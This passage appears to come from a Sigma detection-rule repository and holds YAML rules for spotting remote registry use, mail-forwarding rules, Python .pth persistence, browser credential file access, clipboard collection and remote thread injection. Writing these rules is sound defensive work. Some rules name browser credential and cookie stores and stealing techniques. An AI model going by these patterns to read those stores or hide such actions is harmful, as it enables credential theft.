    "content": "title: Remote Registry Management Using Reg Utility\nid: 68fcba0d-73a5-475e-a915-e8b4c576827e\nstatus: test\ndescription: Remote registry management using REG utility from non-admin workstation\nreferences:\n    - https://www.slideshare.net/heirhabarov/hunting-for-credentials-dumping-in-windows-environment\nauthor: Teymur Kheirkhabarov, oscd.community\ndate: 2019-10-22\nmodified: 2023-12-15\ntags:\n    - attack.credential-access\n    - attack.defense-evasion\n    - attack.persistence\n    - attack.discovery\n    - attack.s0075\n    - attack.t1012\n    - attack.t1112\n    - attack.t1552.002\nlogsource:\n    product: windows\n    service: security\ndetection:\n    selection:\n        EventID: 5145\n        RelativeTargetName|contains: '\\winreg'\n    filter_main:\n        IpAddress|expand: '%Admins_Workstations%'\n    condition: selection and not filter_main\nfalsepositives:\n    - Legitimate usage of remote registry management by administrator\nlevel: medium\n"
  },
  {
    "path": "rules-placeholder/windows/builtin/security/win_security_susp_interactive_logons.yml",
    "content": "title: Interactive Logon to Server Systems\nid: 3ff152b2-1388-4984-9cd9-a323323fdadf\nstatus: test\ndescription: Detects interactive console logons to Server Systems\nreferences:\n    - Internal Research\nauthor: Florian Roth (Nextron Systems)\ndate: 2017-03-17\nmodified: 2023-12-15\ntags:\n    - attack.lateral-movement\n    - attack.defense-evasion\n    - attack.initial-access\n    - attack.persistence\n    - attack.privilege-escalation\n    - attack.t1078\nlogsource:\n    product: windows\n    service: security\ndetection:\n    selection:\n        EventID:\n            - 528\n            - 529\n            - 4624\n            - 4625\n        LogonType: 2\n        ComputerName|expand:\n            - '%ServerSystems%'\n            - '%DomainControllers%'\n    filter_main_advapi:\n        LogonProcessName: 'Advapi'\n        ComputerName|expand: '%Workstations%'\n    condition: selection and not 1 of filter_main_*\nfalsepositives:\n    - Administrative activity via KVM or ILO board\nlevel: medium\n"
  },
  {
    "path": "rules-placeholder/windows/dns_query/dns_query_win_wscript_cscript_resolution.yml",
    "content": "title: DNS Request From Windows Script Host\nid: 12310575-e8b1-475c-a976-57ed540b349c\nstatus: test\ndescription: |\n    Detects unusual domain resolutions originating from CScript/WScript that can identify malicious javascript files executing in an environment, often as a result from a phishing or watering hole attack.\nauthor: Josh Nickels, Marius Rothenbücher\nreferences:\n    - Internal Research\ndate: 2024-09-06\ntags:\n    - attack.execution\n    - attack.t1059\nlogsource:\n    product: windows\n    category: dns_query\ndetection:\n    selection:\n        Image|endswith:\n            - '\\wscript.exe'\n            - '\\cscript.exe'\n        QueryName|contains: '.' # Ensures that lookups are for external hosts\n    filter_main_internal_domains: # Populate this placeholder with known and expected internal domains\n        QueryName|expand: '%internal_domains%'\n    filter_optional_trusted_domains: # Mostly certificate distribution domains\n        - QueryName:\n              - 'crl.starfieldtech.com'\n              - 'ocsp.usertrust.com'\n              - 'officecdn.microsoft.com'\n              - 'oneocsp.microsoft.com'\n              - 'oscp.comodoca.com'\n              - 'oscp.sectigo.com'\n              - 'oscp.starfieldtech.com'\n              - 'www.python.org'\n        - QueryName|endswith:\n              - '.digicert.com'\n              - '.entrust.net'\n              - '.globalsign.net'\n              - '.verisign.com'\n    condition: selection and not 1 of filter_main_* and not 1 of filter_optional_*\nfalsepositives:\n    - Script files making expected domain requests\nlevel: low\n"
  },
  {
    "path": "rules-placeholder/windows/network_connection/net_connection_win_susp_rdp_from_domain_controller.yml",
    "content": "title: New RDP Connection Initiated From Domain Controller\nid: fda34293-718e-4b36-b018-38caab0d1209\nstatus: test\ndescription: Detects an RDP connection originating from a domain controller.\nreferences:\n    - Internal Research\nauthor: Josh Nickels\ndate: 2024-05-10\ntags:\n    - attack.lateral-movement\n    - attack.t1021\nlogsource:\n    product: windows\n    category: network_connection\ndetection:\n    selection_connection:\n        Initiated: 'True'\n        DestinationPort: 3389\n    selection_hosts:\n        Computer|expand: '%domain_controller_hostnames%'\n    filter_optional_defender_identity:\n        Image|endswith: '\\Microsoft.Tri.Sensor.exe' # Microsoft Defender for Identity service makes port 3389 connections to hosts\n    condition: all of selection_* and not 1 of filter_*\nfalsepositives:\n    - Legitimate administration activity\nlevel: high\n"
  },
  {
    "path": "rules-placeholder/windows/process_creation/proc_creation_win_userdomain_variable_enumeration.yml",
    "content": "title: Userdomain Variable Enumeration\nid: 43311e65-84d8-42a5-b3d4-c94d9b67038f\nstatus: test\ndescription: Detects suspicious enumeration of the domain the user is associated with.\nreferences:\n    - https://www.arxiv-vanity.com/papers/2008.04676/\n    - https://thedfirreport.com/2022/11/14/bumblebee-zeros-in-on-meterpreter/\nauthor: 'Christopher Peacock @SecurePeacock, SCYTHE @scythe_io'\ndate: 2023-02-09\nmodified: 2024-08-01\ntags:\n    - attack.discovery\n    - attack.t1016\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection:\n        CommandLine|contains: 'echo '\n        CommandLine|contains|expand: '%userdomain%'\n    condition: selection\nfalsepositives:\n    - Certain scripts or applications may leverage this.\nlevel: low\n"
  },
  {
    "path": "rules-threat-hunting/README.md",
    "content": "TBD"
  },
  {
    "path": "rules-threat-hunting/cloud/m365/audit/microsoft365_susp_email_forwarding_activity.yml",
    "content": "title: Mail Forwarding/Redirecting Activity In O365\nid: c726e007-2cd0-4a55-abfb-79730fbedee5\nstatus: test\ndescription: Detects email forwarding or redirecting activity in O365 Audit logs.\nreferences:\n    - https://redcanary.com/blog/email-forwarding-rules/\n    - https://github.com/PwC-IR/Business-Email-Compromise-Guide/blob/fe29ce06aef842efe4eb448c26bbe822bf5b895d/PwC-Business_Email_Compromise-Guide.pdf\nauthor: RedCanary Team (idea), Harjot Singh @cyb3rjy0t\ndate: 2023-10-11\nmodified: 2024-11-17\ntags:\n    - attack.collection\n    - attack.t1114.003\n    - attack.defense-evasion\n    - attack.t1564.008\n    - attack.exfiltration\n    - attack.t1020\n    - detection.threat-hunting\nlogsource:\n    service: audit\n    product: m365\n    definition: \"Requirements: The 'OperationProperties' and 'Parameters' fields are a list of dict. A correct mapping to the 'Value' field inside is recommended to avoid greedy search\"\ndetection:\n    # Note: Might require seperation in the future when enough data is gatherd\n    selection_updateinbox:\n        Operation|contains: 'UpdateInboxRules'\n        OperationProperties|contains:\n            - 'Forward'\n            - 'Recipients'\n    selection_setmailbox:\n        Operation|contains: 'Set-Mailbox'\n        Parameters|contains:\n            - 'ForwardingSmtpAddress'\n            - 'ForwardingAddress'\n    selection_setinbox:\n        Operation|contains:\n            - 'New-InboxRule'\n            - 'Set-InboxRule'\n        Parameters|contains:\n            - 'ForwardAsAttachmentTo'\n            - 'ForwardingAddress'\n            - 'ForwardingSmtpAddress'\n            - 'ForwardTo'\n            - 'RedirectTo'\n            - 'RedirectToRecipients'\n    condition: 1 of selection_*\nfalsepositives:\n    - False positives are expected from legitimate mail forwarding rules. You need organisation specific knowledge. 
Filter out the domains that are allowed as forwarding targets as well as any additional metadata that you can use for exclusion from trusted sources/targets in order to promote this to a potential detection rule.\nlevel: medium\n"
  },
  {
    "path": "rules-threat-hunting/cloud/m365/audit/microsoft365_susp_inbox_rule_creation_or_update_activity.yml",
    "content": "title: Inbox Rules Creation Or Update Activity in O365\nid: d3577be1-42c9-44a7-b56e-2e8de97349d3\nstatus: experimental\ndescription: |\n    Detects inbox rule creation or update via O365 Audit logs, a technique commonly observed in Business Email Compromise (BEC) attacks to hide emails.\n    The usage of inbox rules can be a sign of a compromised mailbox, where an attacker is attempting to evade detections by suppressing or redirecting incoming emails.\n    Analysts should review these rules in context, validate whether they reflect normal user behavior, and correlate with other indicators such as unusual login activity or recent mailbox rule modifications.\nreferences:\n    - https://redcanary.com/threat-detection-report/techniques/email-hiding-rules/\n    - https://learn.microsoft.com/it-it/powershell/module/exchangepowershell/set-inboxrule?view=exchange-ps\n    - https://learn.microsoft.com/it-it/powershell/module/exchangepowershell/new-inboxrule?view=exchange-ps\nauthor: Marco Pedrinazzi (@pedrinazziM) (InTheCyber)\ndate: 2026-01-09\ntags:\n    - attack.defense-evasion\n    - attack.t1564.008\n    - attack.exfiltration\n    - attack.collection\n    - attack.t1114.003\n    - detection.threat-hunting\nlogsource:\n    service: audit\n    product: m365\n    definition: \"Requirements: The 'Parameters' field is a list of dict. A correct mapping to the 'Value' field inside is recommended to avoid greedy search\"\ndetection:\n    selection:\n        Operation:\n            - 'New-InboxRule'\n            - 'Set-InboxRule'\n        Parameters|contains:\n            - 'DeleteMessage'\n            - 'MarkAsRead'\n            - 'MoveToFolder'\n            - 'SubjectOrBodyContainsWords'\n    condition: selection\nfalsepositives:\n    - Legitimate inbox rules created by users or administrators to manage email flow such as filtering, organizing, or automating email handling.\nlevel: medium\n"
  },
  {
    "path": "rules-threat-hunting/cloud/okta/okta_password_health_report_query.yml",
    "content": "title: Okta Password Health Report Query\nid: 0d58814b-1660-4d31-8c93-d1086ed24cba\nstatus: test\ndescription: |\n    Detects all activities against the endpoint \"/reports/password-health/*\" which should only be accessed via OKTA Admin Console UI.\n    Use this rule to hunt for potential suspicious requests. Correlate this event with \"admin console\" login and alert on requests without any corresponding admin console login\nreferences:\n    - https://www.beyondtrust.com/blog/entry/okta-support-unit-breach\nauthor: Muhammad Faisal (@faisalusuf)\ndate: 2023-10-25\ntags:\n    - attack.credential-access\n    - detection.threat-hunting\nlogsource:\n    service: okta\n    product: okta\ndetection:\n    selection:\n        debugContext.debugData.requestUri|contains: '/reports/password-health/'\n    condition: selection\nfalsepositives:\n    - OKTA Admin Activites via Web Console UI.\n    - This rule is recommended to be used for threat hunting, especially in the context of OKTA support incident in OCT-2023.\n    - This rule can be used to hunt the activity against endpoints like /reports/password-health/async_csv_download_schedule?, which are typically used from Okta Admin Console UI only, without any corresponding admin console login. See reference\nlevel: low\n"
  },
  {
    "path": "rules-threat-hunting/linux/file/file_event/file_event_lnx_python_path_configuration_files.yml",
    "content": "title: Python Path Configuration File Creation - Linux\nid: fb96c26c-9f85-4ae7-af0d-ed1ed1f1f5ce\nrelated:\n    - id: e3652ba3-0ad8-4010-a957-b7ba369e7bac # Windows\n      type: similar\n    - id: 4f394635-13ef-4599-b677-3353e0f84f55 # MacOS\n      type: similar\nstatus: test\ndescription: |\n    Detects creation of a Python path configuration file (.pth) in Python library folders, which can be maliciously abused for code execution and persistence.\n    Modules referenced by these files are run at every Python startup (v3.5+), regardless of whether the module is imported by the calling script.\n    Default paths are '\\lib\\site-packages\\*.pth' (Windows) and '/lib/pythonX.Y/site-packages/*.pth' (Unix and macOS).\nreferences:\n    - https://www.volexity.com/blog/2024/04/12/zero-day-exploitation-of-unauthenticated-remote-code-execution-vulnerability-in-globalprotect-cve-2024-3400/\n    - https://www.virustotal.com/gui/file/3de2a4392b8715bad070b2ae12243f166ead37830f7c6d24e778985927f9caac\n    - https://docs.python.org/3/library/site.html\nauthor: Andreas Braathen (mnemonic.io)\ndate: 2024-04-25\ntags:\n    - attack.execution\n    - attack.t1059.006\n    - detection.threat-hunting\nlogsource:\n    product: linux\n    category: file_event\ndetection:\n    selection:\n        TargetFilename|re: '(?i)/lib/python3\\.([5-9]|[0-9]{2})/site-packages/' # Unix and macOS\n        TargetFilename|endswith: '.pth'\n    condition: selection\nfalsepositives:\n    - Although .pth files are discouraged due to potential security implications, these are legitimate files by specification.\nlevel: medium\n"
  },
  {
    "path": "rules-threat-hunting/linux/file/file_event/file_event_lnx_susp_long_filename_pattern.yml",
    "content": "title: Potentially Suspicious Long Filename Pattern - Linux\nid: 11629c4d-0fe6-465b-be62-b39a1c442aad\nstatus: experimental\ndescription: |\n    Detects the creation of files with unusually long filenames (100 or more characters), which may indicate obfuscation techniques used by malware such as VShell.\n    This is a hunting rule to identify potential threats that use long filenames to evade detection. Keep in mind that on a legitimate system, such long filenames can and are common. Run this detection in the context of threat hunting rather than alerting.\n    Adjust the threshold of filename length as needed based on your environment.\nreferences:\n    - https://www.trellix.com/blogs/research/the-silent-fileless-threat-of-vshell/\nauthor: '@kostastsale'\ndate: 2025-11-22\ntags:\n    - attack.execution\n    - attack.t1059.004\n    - attack.defense-evasion\n    - attack.t1027\n    - detection.threat-hunting\nlogsource:\n    product: linux\n    category: file_event\ndetection:\n    selection:\n        TargetFilename|re: '[^/]{100,}$'\n    filter_optional_known_good:\n        TargetFilename|startswith:\n            - '/run/systemd/units/invocation:systemd-fsck@'\n            - '/sys/firmware/'\n            - '/var/log/journal/'\n    condition: selection and not 1 of filter_optional_*\nfalsepositives:\n    - Legitimate files with long filenames.\nlevel: low\n"
  },
  {
    "path": "rules-threat-hunting/linux/process_creation/proc_creation_lnx_susp_process_termination_via_kill.yml",
    "content": "title: Terminate Linux Process Via Kill\nid: 64c41342-6b27-523b-5d3f-c265f3efcdb3\nstatus: test\ndescription: Detects usage of command line tools such as \"kill\", \"pkill\" or \"killall\" to terminate or signal a running process.\nreferences:\n    - https://www.trendmicro.com/en_us/research/23/c/iron-tiger-sysupdate-adds-linux-targeting.html\n    - https://www.cyberciti.biz/faq/how-force-kill-process-linux/\n    - https://www.geeksforgeeks.org/how-to-kill-processes-on-the-linux-desktop-with-xkill/\nauthor: Tuan Le (NCSGroup)\ndate: 2023-03-16\nmodified: 2024-12-12\ntags:\n    - attack.defense-evasion\n    - attack.t1562\n    - detection.threat-hunting\nlogsource:\n    product: linux\n    category: process_creation\ndetection:\n    selection:\n        Image|endswith:\n            - '/kill'\n            - '/killall'\n            - '/pkill'\n            - '/xkill'\n    condition: selection\nfalsepositives:\n    - Unknown\nlevel: medium\n"
  },
  {
    "path": "rules-threat-hunting/linux/process_creation/proc_creation_lnx_susp_running_process_discovery.yml",
    "content": "title: Process Discovery\nid: 4e2f5868-08d4-413d-899f-dc2f1508627b\nstatus: stable\ndescription: |\n  Detects process discovery commands. Adversaries may attempt to get information about running processes on a system.\n  Information obtained could be used to gain an understanding of common software/applications running on systems within the network\nreferences:\n    - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1057/T1057.md\n    - https://www.cyberciti.biz/faq/show-all-running-processes-in-linux/\nauthor: Ömer Günal, oscd.community, CheraaghiMilad\ndate: 2020-10-06\nmodified: 2022-07-07\ntags:\n    - attack.discovery\n    - attack.t1057\n    - detection.threat-hunting\nlogsource:\n    product: linux\n    category: process_creation\ndetection:\n    selection:\n        Image|endswith:\n            - '/atop'\n            - '/htop'\n            - '/pgrep'\n            - '/ps'\n            - '/pstree'\n            - '/top'\n    condition: selection\nfalsepositives:\n    - Legitimate administration activities\nlevel: low\n"
  },
  {
    "path": "rules-threat-hunting/macos/file/file_event/file_event_macos_python_path_configuration_files.yml",
    "content": "title: Python Path Configuration File Creation - MacOS\nid: 4f394635-13ef-4599-b677-3353e0f84f55\nrelated:\n    - id: e3652ba3-0ad8-4010-a957-b7ba369e7bac # Windows\n      type: similar\n    - id: fb96c26c-9f85-4ae7-af0d-ed1ed1f1f5ce # Linux\n      type: similar\nstatus: test\ndescription: |\n    Detects creation of a Python path configuration file (.pth) in Python library folders, which can be maliciously abused for code execution and persistence.\n    Modules referenced by these files are run at every Python startup (v3.5+), regardless of whether the module is imported by the calling script.\n    Default paths are '\\lib\\site-packages\\*.pth' (Windows) and '/lib/pythonX.Y/site-packages/*.pth' (Unix and macOS).\nreferences:\n    - https://www.volexity.com/blog/2024/04/12/zero-day-exploitation-of-unauthenticated-remote-code-execution-vulnerability-in-globalprotect-cve-2024-3400/\n    - https://www.virustotal.com/gui/file/3de2a4392b8715bad070b2ae12243f166ead37830f7c6d24e778985927f9caac\n    - https://docs.python.org/3/library/site.html\nauthor: Andreas Braathen (mnemonic.io)\ndate: 2024-04-25\ntags:\n    - attack.execution\n    - attack.t1059.006\n    - detection.threat-hunting\nlogsource:\n    product: macos\n    category: file_event\ndetection:\n    selection:\n        TargetFilename|re: '(?i)/lib/python3\\.([5-9]|[0-9]{2})/site-packages/' # Unix and macOS\n        TargetFilename|endswith: '.pth'\n    condition: selection\nfalsepositives:\n    - Although .pth files are discouraged due to potential security implications, these are legitimate files by specification.\nlevel: medium\n"
  },
  {
    "path": "rules-threat-hunting/macos/process_creation/proc_creation_macos_pbpaste_execution.yml",
    "content": "title: Clipboard Data Collection Via Pbpaste\nid: d8af0da1-2959-40f9-a3e4-37a6aa1228b7\nstatus: test\ndescription: |\n    Detects execution of the \"pbpaste\" utility, which retrieves the contents of the clipboard (a.k.a. pasteboard) and writes them to the standard output (stdout).\n    The utility is often used for creating new files with the clipboard content or for piping clipboard contents to other commands.\n    It can also be used in shell scripts that may require clipboard content as input.\n    Attackers can abuse this utility in order to collect data from the user clipboard, which may contain passwords or sensitive information.\n    Use this rule to hunt for potential abuse of the utility by looking at the parent process and any potentially suspicious command line content.\nreferences:\n    - https://www.loobins.io/binaries/pbpaste/\n    - https://medium.com/@NullByteWht/hacking-macos-how-to-dump-1password-keepassx-lastpass-passwords-in-plaintext-723c5b1c311b\n    - https://media.defense.gov/2021/Jul/19/2002805003/-1/-1/1/CSA_CHINESE_STATE-SPONSORED_CYBER_TTPS.PDF\nauthor: Daniel Cortez\ndate: 2024-07-30\ntags:\n    - attack.collection\n    - attack.credential-access\n    - attack.t1115\n    - detection.threat-hunting\nlogsource:\n    product: macos\n    category: process_creation\ndetection:\n    selection:\n        Image|endswith: '/pbpaste'\n    condition: selection\nfalsepositives:\n    - Legitimate administration activities\nlevel: medium\n"
  },
  {
    "path": "rules-threat-hunting/network/net_dns_low_reputation_etld.yml",
    "content": "title: Low Reputation Effective Top-Level Domain (eTLD)\nid: cf5ee356-65c4-4556-8d11-6977fcdfed4b\nstatus: experimental\ndescription: Detects DNS queries to domains within known low reputation eTLDs. This rule uses AlphaSOC's threat intelligence data and is updated on a monthly basis.\nreferences:\n    - https://feeds.alphasoc.net/bad-etlds.txt\nauthor: Norbert Jaśniewicz (AlphaSOC)\ndate: 2025-08-04\ntags:\n    - attack.command-and-control\n    - attack.t1071.004\n    - attack.initial-access\n    - detection.threat-hunting\nlogsource:\n    category: dns\ndetection:\n    selection:\n        query|endswith:\n            - '.duckdns.org'\n            - '.top'\n            - '.ddns.net'\n            - '.gl.at.ply.gg'\n            - '.portmap.io'\n            - '.icu'\n            - '.zapto.org'\n            - '.live'\n            - '.hopto.org'\n            - '.portmap.host'\n            - '.sbs'\n            - '.sytes.net'\n            - '.click'\n            - '.ydns.eu'\n            - '.site'\n            - '.cloud'\n            - '.no-ip.org'\n            - '.kozow.com'\n            - '.lat'\n            - '.pro'\n    condition: selection\nfalsepositives:\n    - Unknown\nlevel: medium\n"
  },
  {
    "path": "rules-threat-hunting/web/proxy_generic/proxy_susp_class_extension_request.yml",
    "content": "title: .Class Extension URI Ending Request\nid: 53c15703-b04c-42bb-9055-1937ddfb3392\nstatus: test\ndescription: |\n    Detects requests to URI ending with the \".class\" extension in proxy logs.\n    This could rules can be used to hunt for potential downloads of Java classes as seen for example in Log4shell exploitation attacks against Log4j.\nreferences:\n    - https://web.archive.org/web/20231230220738/https://www.lunasec.io/docs/blog/log4j-zero-day/\nauthor: Andreas Hunkeler (@Karneades)\ndate: 2021-12-21\nmodified: 2024-02-26\ntags:\n    - attack.initial-access\n    - detection.threat-hunting\nlogsource:\n    category: proxy\ndetection:\n    selection:\n        c-uri|endswith: '.class'\n    condition: selection\nfalsepositives:\n    - Unknown\nlevel: medium\n"
  },
  {
    "path": "rules-threat-hunting/windows/builtin/appxdeployment_server/win_appxpackaging_server_successful_package_installation.yml",
    "content": "title: Successful MSIX/AppX Package Installation\nid: 289dfa9e-e378-4a56-a9d4-7ed5ee218029\nstatus: experimental\ndescription: |\n    Detects successful MSIX/AppX package installations on Windows systems by monitoring EventID 854 in the Microsoft-Windows-AppXDeployment-Server/Operational log.\n    While most installations are legitimate, this can help identify unauthorized or suspicious package installations.\n    It is crucial to monitor such events as threat actors may exploit MSIX/AppX packages to deliver and execute malicious payloads.\nreferences:\n    - https://www.splunk.com/en_us/blog/security/msix-weaponization-threat-detection-splunk.html\nauthor: Michael Haag, Swachchhanda Shrawan Poudel (Nextron Systems)\ndate: 2025-11-03\ntags:\n    - attack.execution\n    - attack.t1204.002\n    - detection.threat-hunting\nlogsource:\n    product: windows\n    service: appxdeployment-server\ndetection:\n    selection:\n        EventID: 854\n    condition: selection\nfalsepositives:\n    - Legitimate MSIX/AppX package installations\nlevel: low\n"
  },
  {
    "path": "rules-threat-hunting/windows/builtin/firewall_as/win_firewall_as_change_rule.yml",
    "content": "title: Firewall Rule Modified In The Windows Firewall Exception List\nid: 5570c4d9-8fdd-4622-965b-403a5a101aa0\nstatus: test\ndescription: Detects when a rule has been modified in the Windows firewall exception list\nreferences:\n    - https://docs.microsoft.com/en-us/previous-versions/windows/it-pro/windows-server-2008-r2-and-2008/dd364427(v=ws.10)\nauthor: frack113\ndate: 2022-02-19\nmodified: 2024-01-22\ntags:\n    - attack.defense-evasion\n    - attack.t1562.004\n    - detection.threat-hunting\nlogsource:\n    product: windows\n    service: firewall-as\ndetection:\n    selection:\n        EventID:\n            - 2005 # A rule has been modified in the Windows Defender Firewall exception list (Windows 10)\n            - 2073 # A rule has been modified in the Windows Defender Firewall exception list. (Windows 11)\n    filter_optional_teams:\n        ApplicationPath|endswith: '\\AppData\\local\\microsoft\\teams\\current\\teams.exe'\n    filter_optional_keybase:\n        ApplicationPath|endswith: '\\AppData\\Local\\Keybase\\keybase.exe'\n    filter_optional_messenger:\n        ApplicationPath|endswith: '\\AppData\\Local\\Programs\\Messenger\\Messenger.exe'\n    filter_optional_opera:\n        ApplicationPath|contains|all:\n            - ':\\Users\\'\n            - '\\AppData\\Local\\Programs\\Opera\\'\n            - '\\opera.exe'\n    filter_optional_brave:\n        ApplicationPath|contains|all:\n            - ':\\Users\\'\n            - '\\AppData\\Local\\BraveSoftware\\Brave-Browser\\Application\\brave.exe'\n    condition: selection and not 1 of filter_optional_*\nlevel: low\n"
  },
  {
    "path": "rules-threat-hunting/windows/builtin/security/account_management/win_security_scrcons_remote_wmi_scripteventconsumer.yml",
    "content": "title: Potential Remote WMI ActiveScriptEventConsumers Activity\nid: 9599c180-e3a8-4743-8f92-7fb96d3be648\nstatus: test\ndescription: |\n    Detects potential adversaries leveraging WMI ActiveScriptEventConsumers remotely to move laterally in a network.\n    This event is best correlated and used as an enrichment to determine the potential lateral movement activity.\nreferences:\n    - https://threathunterplaybook.com/hunts/windows/200902-RemoteWMIActiveScriptEventConsumers/notebook.html\nauthor: Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research)\ndate: 2020-09-02\nmodified: 2024-09-02\ntags:\n    - attack.lateral-movement\n    - attack.privilege-escalation\n    - detection.threat-hunting\n    - attack.persistence\n    - attack.t1546.003\nlogsource:\n    product: windows\n    service: security\ndetection:\n    selection:\n        EventID: 4624\n        LogonType: 3\n        ProcessName|endswith: 'scrcons.exe'\n    filter_main_local_system:\n        TargetLogonId: '0x3e7' # Local System\n    condition: selection and not 1 of filter_main_*\nfalsepositives:\n    - SCCM\nlevel: medium\n"
  },
  {
    "path": "rules-threat-hunting/windows/builtin/security/win_security_file_access_browser_credential.yml",
    "content": "title: Access To Browser Credential Files By Uncommon Applications - Security\nid: 4b60e527-ec73-4b47-8cb3-f02ad927ca65\nrelated:\n    - id: 91cb43db-302a-47e3-b3c8-7ede481e27bf\n      type: similar\nstatus: test\ndescription: |\n    Detects file access requests to browser credential stores by uncommon processes. Could indicate potential attempt of credential stealing. This rule requires heavy baselining before usage.\nreferences:\n    - https://ipurple.team/2024/09/10/browser-stored-credentials/\nauthor: Daniel Koifman (@Koifsec), Nasreddine Bencherchali\ndate: 2024-10-21\ntags:\n    - attack.credential-access\n    - attack.t1555.003\n    - detection.threat-hunting\nlogsource:\n    product: windows\n    service: security\n    definition: 'Requirements: Audit File System subcategory must be enabled. Additionally, each listed ObjectName must have \"List folder/read data\" auditing enabled.'\ndetection:\n    selection_eid:\n        EventID: 4663\n        ObjectType: 'File'\n        # Note: This AccessMask requires enhancements. As this access can be combined with other requests. It should include all possible outcomes where READ access and similar are part of it.\n        AccessMask: '0x1'\n    selection_browser_chromium:\n        ObjectName|contains:\n            - '\\User Data\\Default\\Login Data'\n            - '\\User Data\\Local State'\n            - '\\User Data\\Default\\Network\\Cookies'\n    selection_browser_firefox:\n        FileName|endswith:\n            - '\\cookies.sqlite'\n            - '\\places.sqlite'\n            - 'release\\key3.db'  # Firefox\n            - 'release\\key4.db'  # Firefox\n            - 'release\\logins.json' # Firefox\n    filter_main_system:\n        ProcessName: System\n    filter_main_generic:\n        # This filter is added to avoid large amount of FP with 3rd party software. You should remove this in favour of specific filter per-application\n        ProcessName|startswith:\n            - 'C:\\Program Files (x86)\\'\n            - 'C:\\Program Files\\'\n            - 'C:\\Windows\\system32\\'\n            - 'C:\\Windows\\SysWOW64\\'\n    filter_optional_defender:\n        ProcessName|startswith: 'C:\\ProgramData\\Microsoft\\Windows Defender\\'\n        ProcessName|endswith:\n            - '\\MpCopyAccelerator.exe'\n            - '\\MsMpEng.exe'\n    condition: selection_eid and 1 of selection_browser_* and not 1 of filter_main_* and not 1 of filter_optional_*\nfalsepositives:\n    - Unknown\nlevel: low\n"
  },
  {
    "path": "rules-threat-hunting/windows/builtin/security/win_security_scheduled_task_deletion.yml",
    "content": "title: Scheduled Task Deletion\nid: 4f86b304-3e02-40e3-aa5d-e88a167c9617\nstatus: test\ndescription: Detects scheduled task deletion events. Scheduled tasks are likely to be deleted if not used for persistence. Malicious Software often creates tasks directly under the root node e.g. \\TASKNAME\nreferences:\n    - https://twitter.com/matthewdunwoody/status/1352356685982146562\n    - https://docs.microsoft.com/en-us/windows/security/threat-protection/auditing/event-4699\nauthor: David Strassegger, Tim Shelton\ndate: 2021-01-22\nmodified: 2023-01-20\ntags:\n    - attack.execution\n    - attack.privilege-escalation\n    - attack.persistence\n    - car.2013-08-001\n    - attack.t1053.005\n    - detection.threat-hunting\nlogsource:\n    product: windows\n    service: security\n    definition: 'Requirements: The Advanced Audit Policy setting Object Access > Audit Other Object Access Events has to be configured to allow this detection. We also recommend extracting the Command field from the embedded XML in the event data.'\ndetection:\n    selection:\n        EventID: 4699\n    filter_main_generic:\n        TaskName: '\\Microsoft\\Windows\\RemovalTools\\MRT_ERROR_HB' # Triggered by ParentCommandLine=C:\\WINDOWS\\system32\\MRT.exe /EHB /HeartbeatFailure ErrorStack,Previous=ErrorStack,Previous=ErrorStack,Previous=ErrorStack,Previous=ErrorStack,Previous=SubmitHeartbeatReportData,Hr=0x80072f8f,Hr=0x80072f8f,Hr=0x80072f8f,Hr=0x80072f8f,Hr=0x80072f8f /HeartbeatError 0x80072f8f\n    filter_main_firefox:\n        TaskName|contains: '\\Mozilla\\Firefox Default Browser Agent ' # Triggered by firefox updates\n    condition: selection and not 1 of filter_*\nfalsepositives:\n    - Software installation\nlevel: low\n"
  },
  {
    "path": "rules-threat-hunting/windows/create_remote_thread/create_remote_thread_win_loadlibrary.yml",
    "content": "title: CreateRemoteThread API and LoadLibrary\nid: 052ec6f6-1adc-41e6-907a-f1c813478bee\nstatus: test\ndescription: Detects potential use of CreateRemoteThread api and LoadLibrary function to inject DLL into a process\nreferences:\n    - https://threathunterplaybook.com/hunts/windows/180719-DLLProcessInjectionCreateRemoteThread/notebook.html\nauthor: Roberto Rodriguez @Cyb3rWard0g\ndate: 2019-08-11\nmodified: 2024-01-22\ntags:\n    - attack.defense-evasion\n    - attack.privilege-escalation\n    - attack.t1055.001\n    - detection.threat-hunting\nlogsource:\n    product: windows\n    category: create_remote_thread\ndetection:\n    selection:\n        StartModule|endswith: '\\kernel32.dll'\n        StartFunction: 'LoadLibraryA'\n    condition: selection\nfalsepositives:\n    - Unknown\nlevel: medium\n"
  },
  {
    "path": "rules-threat-hunting/windows/create_remote_thread/create_remote_thread_win_powershell_generic.yml",
    "content": "title: Remote Thread Creation Via PowerShell\nid: eeb2e3dc-c1f4-40dd-9bd5-149ee465ad50\nrelated:\n    - id: 99b97608-3e21-4bfe-8217-2a127c396a0e\n      type: derived\nstatus: test\ndescription: Detects the creation of a remote thread from a Powershell process to another process\nreferences:\n    - https://speakerdeck.com/heirhabarov/hunting-for-powershell-abuse\nauthor: Nikita Nazarov, oscd.community\ndate: 2020-10-06\nmodified: 2023-11-10\ntags:\n    - attack.execution\n    - attack.t1059.001\n    - detection.threat-hunting\nlogsource:\n    product: windows\n    category: create_remote_thread\ndetection:\n    selection:\n        SourceImage|endswith:\n            - '\\powershell.exe'\n            - '\\pwsh.exe'\n    filter_main_compattelrunner:\n        SourceParentImage|endswith: ':\\Windows\\System32\\CompatTelRunner.exe'\n    condition: selection and not 1 of filter_main_*\nfalsepositives:\n    - Unknown\nlevel: medium\n"
  },
  {
    "path": "rules-threat-hunting/windows/create_remote_thread/create_remote_thread_win_susp_target_shell_application.yml",
    "content": "title: Remote Thread Created In Shell Application\nid: a9d4d3fa-8fc0-41bc-80b1-30b9fda79d6f\nstatus: test\ndescription: |\n    Detects remote thread creation in command shell applications, such as \"Cmd.EXE\" and \"PowerShell.EXE\".\n    It is a common technique used by malware, such as IcedID, to inject malicious code and execute it within legitimate processes.\nreferences:\n    - https://research.splunk.com/endpoint/10399c1e-f51e-11eb-b920-acde48001122/\n    - https://www.binarydefense.com/resources/blog/icedid-gziploader-analysis/\nauthor: Splunk Research Team\ndate: 2024-07-29\nmodified: 2025-07-04\ntags:\n    - attack.defense-evasion\n    - attack.privilege-escalation\n    - attack.t1055\n    - detection.threat-hunting\nlogsource:\n    product: windows\n    category: create_remote_thread\ndetection:\n    selection:\n        TargetImage|endswith:\n            - '\\cmd.exe'\n            - '\\powershell.exe'\n            - '\\pwsh.exe'\n    filter_main_system:\n        SourceImage|startswith:\n            - 'C:\\Windows\\System32\\'\n            - 'C:\\Windows\\SysWOW64\\'\n            - 'C:\\Program Files (x86)\\'\n            - 